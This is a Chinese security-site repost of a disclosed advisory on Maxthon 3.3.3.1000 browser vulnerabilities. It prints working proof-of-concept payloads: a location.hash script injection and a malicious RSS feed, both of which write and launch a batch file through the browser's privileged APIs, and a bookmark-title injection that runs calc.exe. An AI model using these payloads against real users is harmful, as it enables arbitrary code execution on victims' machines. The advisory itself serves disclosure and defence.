链接:http://seclists.org/fulldisclosure/2012/Dec/90 http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!通过location.hash属性注入:http://x.x.x.x/maliciouspage.html#"><img src=a onerror="var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);max thon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")">传递多个参数到可执行文件:http://x.x.x.x/maliciouspage.html#"><img src=a onerror="var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);max thon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")">Maliciouspage.html源代码<body><script>a = window.location.href="about:history";</script></body> 恶意RSS Feed – 任意代码执行 <?xml version="1.0" encoding="ISO-8859-1"?> <rss version="2.0"> <channel> <description>Malerisch.net</description> <link>http://blog.malerisch.net/</link> <title>Malerisch.net</title> <item> <title>test"><img src=a onerror="var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);max thon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")";></title> <link>javascript:alert(window.location);</link> <description>07/09/2008 - test <img src=a onerror="var b= new Copyright Security-Assessment.com www.security-assessment.com maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);max thon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")";></description> <pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate> </item> </channel> </rss> 恶意 Add to Favorite 注入 – HTML 源代码 <html> <head> <title>Google</title> <head> <script> evilpayload="location.href="file:///C:/windows/system32/calc.exe";" padding="Google - www.google.com" padding2=" " padding3=" - the best search engine - bookmark now!!!" window.external.addFavorite("www.google.com",padding+""><scri"+"pt>"+evilpayload+"</"+"scrip t>"+" "+" "+padding+padding3) </script> </head> <body> <h3>Maxthon 3.3.3.1000 - Cross Context Scripting via Bookmark (title parameter) - Code Execution PoC</h3> <font size="+1">Roberto Suggi Liverani - <a href="http://blog.malerisch.net">http://blog.malerisch.net</a> - <a href="https://twitter.com/malerisch">@malerisch</a> - <a href="http://www.securityassessment.com">Security-Assessment.com</a></font> <br>Steps: <ul> <li>User is prompted to bookmark an innocuous looking bookmark, like the one shown in the middle of the screen. The injected payload can only be seen if the user scrolls on the left of the title element. <li>User adds the bookmark. <li>User then clicks on the Star (Favorites) icon or <li>User clicks on the bookmark link from the bookmark toolbar. <li>In both cases, calc.exe is executed. </ul> The code for the exploit:<br> <code> evilpayload="location.href="file:///C:/windows/system32/calc.exe";" window.external.addFavorite("www.google.com","yourpaddinghere"><scri"+"pt>"+evilpayload+"</" +"script>andpaddinghere");Copyright Security-Assessment.com www.security-assessment.com </code> </body> </html>建议: -------------------------------------------------------------------------------- 厂商补丁:Maxthon ------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.maxthon.com/研究人员发现 GPS 系统的严重漏洞Qualcomm Innovation Center (QuIC) diagchar_core.c整数溢出漏洞相关资讯 Maxthon安全漏洞 本文评论 查看全部评论 (0)
易网时代-编程资源站